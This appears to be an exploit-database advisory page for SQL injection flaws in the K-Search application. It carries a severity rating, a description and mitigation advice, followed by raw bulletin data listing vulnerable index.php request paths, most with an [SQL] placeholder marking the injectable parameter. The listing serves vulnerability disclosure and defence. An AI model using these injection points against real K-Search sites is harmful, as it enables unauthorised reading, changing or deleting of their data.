header-logo
Suggest Exploit
vendor:
K-Search
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: K-Search
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:k-search:k-search
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

SQL Injection Vulnerabilities in K-Search

K-Search is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques, such as using prepared statements or parameterized queries.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15588/info

K-Search is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

/index.php?term=%23%25%23term%23%25%23&sm=Mekl%E7t&source=1&req=search

/index.php?term=%28%27r0t+checker%27%29&sm=Mekl%E7t&source=1&req=search

/index.php?req=edit&id=[SQL]
/index.php?req=view&act=stat_all&stat=[SQL]
/index.php?req=view&act=status&id=1&stat=[SQL]
/index.php?req=view&act=status&id=[SQL]
/index.php?req=delsite&id=[SQL]
/index.php?req=search&source=[SQL]